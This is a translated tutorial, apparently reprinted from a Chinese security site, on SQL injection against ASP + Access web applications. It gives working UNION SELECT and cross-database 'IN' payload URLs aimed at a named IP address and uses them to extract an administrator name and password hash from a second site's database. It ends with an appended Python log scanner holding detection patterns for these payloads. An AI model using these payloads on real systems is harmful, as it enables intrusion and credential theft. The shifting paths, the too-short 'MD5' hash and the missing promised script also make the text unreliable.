Cross-database queries in Access

xiaoxiao, 2021-03-06

Everyone still remembers cross-database queries in MSSQL. In fact, Access can also run a query across two databases. Below I introduce cross-database queries in Access. First, let us look at how the query works inside Access itself: we create an empty database and query the contents of the admin table in the database D:/Daos/db/daidalos.mdb. The SQL statement is:

Select * from admin in "d:/daos/db/daidalos.mdb"

The query successfully returns the contents of the admin table in the target database.

In an actual ASP injection this means running two SELECTs at the same time. If you are familiar with PHP + MySQL injection, the UNION query should come to mind immediately, and it can be used in Access too. UNION has another advantage: you do not have to guess the data one character at a time, because the data is returned directly in a field, just as in MySQL + PHP injection (MIX has written a detailed article on the specifics). From the above, you can see that the following two conditions must be met:

1. To use the UNION query, you must know the fields of the table in the preceding SELECT.
2. You must know the location of the target database, that is, its absolute path.

Condition 1 can be worked out manually from the error messages, or it can be automated. Condition 2 is the difficult one, but it can be met by using the "Access exposition" (an error that exposes the database path).

Some people will say that once you know the database location you can simply download it. In practice, databases nowadays are generally protected against download, and some are not under the web directory at all.

The first level in the fourth round of the black defense was a set of two ASP + Access download systems: one is the rainpoint download system, the other is the throne download system. Testing showed that the throne download system exposes its database but does not allow it to be downloaded, and it seems to have nowhere to inject. The rainpoint download system is vulnerable: its database can be exposed and downloaded directly, and it can also be injected. However, the rainpoint back end is very simple and offers nothing to use, so our goal is the back-end password of the throne system. I will demonstrate getting the back-end password of the throne system through the rainpoint system.

We know that list.asp in the rainpoint system can be injected. First we use UNION to get the number of fields in the table. Submit:

http://219.237.81.46/yddow/list.asp?id=75%20Union Select 1 FROM UserInfo

This returned:

Microsoft Jet Database Engine error '80040E14'
The number of columns in the two tables or queries selected in the union query does not match.
/yddow/list.asp, line 51

The number of fields is wrong. I wrote a Perl script to guess it automatically (the code comes afterwards). When we submit:

http://219.237.81.46/yddown/list.asp?id=75 Union Select 1, 2, 3%20From USERINFO

no error is returned.

Haha! We have obtained the number of fields, and we can see that the position of field 1 is shown on the page, so it can display the data we query. Now there is still the problem of the database path. That is simple; we submit:

Http://219.237.81.46/dsdown\regs.asp

The path is returned successfully:

Microsoft Jet Database Engine error '80004005'
'D:/111/db/kljdsld.asa' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file is stored.
/dsdown/db/user.asp, line 6

(Note: the path shown here is not necessarily "complete"; the real path is d:/11/dsdown/db/kljdsld.asa)

Next we run the cross-database query. The constructed URL is as follows:

http://219.237.81.46/yddown/list.asp?id=75 Union Select Admin, 3, 2%20From Admin IN "d:/11/dsdown/db/kljdsld.asa"%20where%20ID = 1

The statement above uses UNION to query the Admin field of the record with ID = 1 in the Admin table of the database D:/111/db/kljdsld.asa. If it succeeds, the user name of the back-end administrator is displayed directly.

The user name obtained is admin. Next we submit the following:

http://219.237.81.46/yddow/list.asp?id=75 Union Select PWS, 3, 2%20From ADMIN IN "d:/111/dsdown/db/kljdsld.asa"%20where%20ID = 1

As shown, we get the password's 32-bit MD5 encrypted hash: 77e6cbb3f94687922. Our cross-database query is successful. Here I only demonstrate the cross-database query; there is no need to go on to the back-end management :).

Summary

This article mainly introduces two very useful methods. First, guessing data one character at a time during injection is very troublesome; with UNION the data is returned directly, whether or not it contains Chinese or special characters, in one step. Second, the cross-database query: used flexibly during a penetration, it can bring results you would not expect.
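For the defending side, the three request shapes used in this walkthrough (a UNION SELECT appended to a parameter, the FROM ... IN "path" external-database clause, and a backslash in the URL path) can be flagged in web server logs. The Python code below is an added example, not code from the original article; the log line layout, the rule names and the sample lines (including the d:/example path) are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed log lines in an assumed "METHOD path query" layout (not real traffic).
SAMPLE_LOG = [
    "GET /yddown/list.asp id=75",
    "GET /yddown/list.asp id=75%20union%20select%201%20from%20userinfo",
    "GET /yddown/list.asp id=75%20union%20select%20admin,3,2%20from%20admin"
    "%20in%20%22d:/example/db/site.asa%22%20where%20id=1",
    "GET /dsdown%5Cregs.asp -",
    "GET /news/show.asp title=student%20union%20elections",  # benign use of "union"
]

RULES = [
    # A UNION [ALL] SELECT appended to a request parameter.
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    # Jet external-database clause: FROM <table> IN "<drive>:/path".
    ("external_db_in", re.compile(r"\bfrom\s+\w+\s+in\s+[\"'][a-z]:[\\/]", re.I)),
]

def normalise(value):
    """URL-decode twice (covers double encoding) and collapse whitespace."""
    decoded = unquote(unquote(value.replace("+", " ")))
    return re.sub(r"\s+", " ", decoded)

def classify(line):
    """Return the names of the rules that one log line triggers."""
    _method, path, query = line.split(" ", 2)
    text = normalise(query)
    hits = [name for name, rx in RULES if rx.search(text)]
    # A backslash in the URL path is the request shape that produced the
    # Jet "not a valid path" error in the article.
    if "\\" in unquote(path):
        hits.append("backslash_in_path")
    return hits

def scan(lines):
    """Map each suspicious line to its rule hits; clean lines are omitted."""
    report = {}
    for line in lines:
        hits = classify(line)
        if hits:
            report[line] = hits
    return report

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOG).items():
        print(",".join(hits), "<-", line)
```

Log matching is a detection aid only; the flaw itself is removed by validating id as an integer or binding it as a query parameter in list.asp.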

When reprinting, please cite the original address: https://www.9cbs.com/read-72438.html
